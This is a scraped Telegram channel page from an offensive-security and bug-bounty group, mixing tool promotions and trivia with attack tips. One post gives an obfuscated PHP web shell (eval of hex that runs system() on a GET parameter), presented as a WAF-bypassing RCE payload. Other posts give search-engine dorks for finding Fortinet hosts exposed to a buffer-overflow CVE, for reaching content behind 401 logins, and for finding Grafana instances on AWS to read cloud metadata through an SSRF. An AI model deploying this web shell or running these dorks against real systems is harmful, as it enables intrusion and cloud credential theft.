Brut Security
14.8K subscribers
927 photos
73 videos
287 files
982 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
Brut Security
Which Android emulator do you use for mobile pentesting?
πŸ‘€Struggling with manual setup for Nox Player in your pentesting workflow? πŸ˜“

⚠️Simplify it with this Noxer tool - https://www.linkedin.com/posts/mandal-saumadip_infosec-cybersecurity-cybersec-activity-7274320457254735872-w3PJ
Please open Telegram to view this post
VIEW IN TELEGRAM
❀9
Brut Security
Hey guys, DarkShadow here β€” back again. You ever tried peeking inside a login panel that hits you with a 401 Unauthorized? No login, no creds β€” just pure access to the content behind it. I’ve got a wild dorking trick for that. Not your regular Google dork…
Hey Hunters,
DarkShadow here β€” back with a slick trick to bypass basic auth on certain subdomains! 😎

Seen those subdomains with login pop-ups? Yep, the classic 401 Unauthorized. Usually, you can’t access anything without creds.

But here’s the twist…

πŸ” Find 401 subdomains with:

domain="target.com" && status_code="401"


Got one? Nice.

πŸ’₯ Bypass trick:
If the target leaks any files or fingerprints (like JS, PDF, XLS, etc.) in public indexes (like FOFA), you can often access them without auth!

🧠 FOFA dork to find leaked files:

domain="401.target.subdomain" && (body=".php" body=".pdf" body=".xls" body=".html" body=".js" body=".json" body=".jpg" body=".conf" body=".jsp" || body=".css")


If you got 200 OK, boom πŸ’£ β€” you’re in.

In my test, I found a JS file that loaded fully in FOFA, even though it normally prompts for login.

πŸ’‘ Pro tip: Save the code, render it locally β€” and access internal content without creds!


So guys, did you like my basic this recon trick? Want more from DarkShadow?

#bypass
πŸ‘24❀15πŸ”₯6πŸ‘5πŸ—Ώ2🐳1
πŸ˜‚
🀣36😒4
🚨Introducing BrutDroid – The Ultimate Android Emulator Automation Toolkit🚨

✨Root, Bypass, Intercept β€” all in just a few clicks.
✨Powered by Frida, Magisk & Burp. Designed for Hackers.
πŸ’₯Automate your mobile testing workflow.
πŸ’₯Clean UI, real power, zero hassle.

▢️See BrutDroid in Action: https://youtu.be/8iYf5lJOmXo
➑️GitHub: https://github.com/Brut-Security/BrutDroid/

#BrutDroid #AndroidHacking #BugBounty #Frida #BurpSuite #Pentesting #AutomationTools #BrutSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯45❀7πŸ‘7😁2
Brut Security pinned «🚨Introducing BrutDroid – The Ultimate Android Emulator Automation Toolkit🚨 ✨Root, Bypass, Intercept β€” all in just a few clicks. ✨Powered by Frida, Magisk & Burp. Designed for Hackers. πŸ’₯Automate your mobile testing workflow. πŸ’₯Clean UI, real power, zero hassle.…»
Where is the reactions guys πŸ‘€πŸ™‚
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯32πŸ‘10πŸ‘¨β€πŸ’»7🐳6❀2🫑1
Hey Hunters,
DarkShadow back at it again, dropping something many of you probably never noticed! 😏

Did you know your Chrome DevTools is actually a webpage itself? 😲

πŸŒ€ URL:
devtools://devtools/bundled/devtools_app.html


Yup, you read that right.

Try this:
πŸ”₯ Open the URL
πŸ”₯ Then hit F12 inside DevTools
πŸ”₯ BOOM β€” you're debugging the DevTools itself 🀯

Ever seen DevTools inside DevTools?
Welcome to the Devception 😈

Let me know in the comments β€”
Who just learned this for the first time?πŸ’€

If you enjoy the kind of content I share, show some loveβ€”like, comment, and share it with your hacker fam.


#bugbountytips
πŸ‘¨β€πŸ’»16❀12πŸ”₯4
Brut Security
🚨Introducing BrutDroid – The Ultimate Android Emulator Automation Toolkit🚨 ✨Root, Bypass, Intercept β€” all in just a few clicks. ✨Powered by Frida, Magisk & Burp. Designed for Hackers. πŸ’₯Automate your mobile testing workflow. πŸ’₯Clean UI, real power, zero hassle.…
πŸ“’ Heads up, folks!

Just released BrutDroid recently β€” an automation toolkit for Android emulator testing. Put in a ton of effort, but honestly, the response hasn’t been as strong as expected.

Might make it private soon. If you’re planning to use it or have feedback, now’s the time! Would love your thoughts.
βš™οΈ

⚠️https://github.com/Brut-Security/BrutDroid/

πŸ’¬ Feel free to DM or tag me with suggestions.

β€” Stay Brut.
Please open Telegram to view this post
VIEW IN TELEGRAM
❀31
πŸ˜†Showing off for first time 😁😁😁
Please open Telegram to view this post
VIEW IN TELEGRAM
4🀣30😁2😱2❀1
πŸ“£ Free 15-Day ZoomEye Membership for Brut Security Members!

πŸŽ‰ ZoomEye β€” one of the most widely used cyberspace search engines for security researchers β€” is offering a 15-day free trial of their Personal Membership exclusively to the Brut Security community.

Perfect for anyone involved in:
⭐️ Bug bounty & recon
⭐️ Red teaming & OSINT
⭐️ Cybersecurity research & learning

⁉️ How to claim your free trial:
➑️ Follow ZoomEye on X: https://x.com/zoomeye_team
➑️ Send them a DM with the message:
✏️ Brut Security
➑️ They’ll activate your 15-day trial access β€” no payment required.

Take advantage of this opportunity and explore ZoomEye’s premium features!

#BrutSecurity #ZoomEye
Please open Telegram to view this post
VIEW IN TELEGRAM
❀8
Hey Hunters,
When it comes to dorking and reconnaissance, which search engine is your go-to and why?
Anonymous Poll
44%
1️⃣ Google Dorking
25%
2️⃣ Shodan
20%
3️⃣ FOFA (now with AI!)
4%
4️⃣ ZoomEye
2%
5️⃣ Netlas
6%
6️⃣ Censys
❀7
Brut Security
Photo
πŸŒ€I made this payload that able to bypass WAF even IDS to execute RCEπŸ’€

<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>



πŸ‘€Hex decode:

if($x_=$_GET[0]){system($x_);
}


🀫 DarkShadow's secret payload don't share outside ☠
❀20πŸ—Ώ8πŸ‘3πŸ€”2
Hey Hunter's,
Here's allll useful commands check it out πŸ”₯
❀13🫑6🀝2
CVE-2025-32756: Buffer Overflow in Fortinet products, 9.8 rating πŸ”₯

Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/nmu5K
πŸ‘‰ Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"

Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
1πŸ”₯8❀4🫑1
Hey Hunter's,
DarkShadow here back again, just dropping a simple FOFA dork that i made to find all Grafana vulnerable versions which are using AWS and that help to you read all cloud metadata through Grafana SSRF CVE-2025-4123

FOFA dork:
app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0" body="Grafana v10.0.1" body="Grafana v10.0.2" body="Grafana v10.0.3" body="Grafana v10.0.4" body="Grafana v10.0.5" body="Grafana v10.0.6" body="Grafana v10.0.7" body="Grafana v10.0.8" body="Grafana v10.0.9" body="Grafana v10.0.10" body="Grafana v10.0.11" body="Grafana v10.0.12" body="Grafana v10.1.0" body="Grafana v10.1.1" body="Grafana v10.1.2" body="Grafana v10.1.3" body="Grafana v10.1.4" body="Grafana v10.1.5" body="Grafana v10.1.6" body="Grafana v10.1.7" body="Grafana v10.1.8" body="Grafana v10.1.9" body="Grafana v10.1.10" body="Grafana v10.2.0" body="Grafana v10.2.1" body="Grafana v10.2.2" body="Grafana v10.2.3" body="Grafana v10.2.4" body="Grafana v10.2.5" body="Grafana v10.2.6" body="Grafana v10.2.7" body="Grafana v10.3.0" body="Grafana v10.3.1" body="Grafana v10.3.2" body="Grafana v10.3.3" body="Grafana v10.3.4" body="Grafana v10.3.5" body="Grafana v10.4.0" body="Grafana v10.4.1" body="Grafana v10.4.2" body="Grafana v10.4.3" body="Grafana v10.4.4" body="Grafana v10.4.5" body="Grafana v10.4.6" body="Grafana v10.4.7" body="Grafana v10.4.8" body="Grafana v10.4.9" body="Grafana v10.4.10" body="Grafana v10.4.11" body="Grafana v10.4.12" body="Grafana v10.4.13" body="Grafana v10.4.14" body="Grafana v10.4.15" body="Grafana v10.4.16" body="Grafana v10.4.17" body="Grafana v11.0.0" body="Grafana v11.0.1" body="Grafana v11.0.2" body="Grafana v11.0.3" body="Grafana v11.0.4" body="Grafana v11.0.5" body="Grafana v11.1.0" body="Grafana v11.1.1" body="Grafana v11.1.2" body="Grafana v11.1.3" body="Grafana v11.1.4" body="Grafana v11.2.0" body="Grafana v11.2.1" body="Grafana v11.2.2" body="Grafana v11.2.3" body="Grafana v11.3.0" body="Grafana v11.3.1" body="Grafana v11.3.2" body="Grafana v11.3.3" body="Grafana v11.4.0" body="Grafana v11.4.1" body="Grafana v11.4.2" body="Grafana v11.4.3" body="Grafana v11.5.0" body="Grafana v11.5.1" body="Grafana v11.5.2" body="Grafana v11.5.3" body="Grafana v11.5.4" body="Grafana v11.5.5" body="Grafana v11.5.6" body="Grafana v11.6.0" || body="Grafana v12.0.0")


Grep the full dork in comment πŸ”₯

#dork #fofa #bugbountytips 
❀18πŸ”₯7πŸ‘2πŸ—Ώ1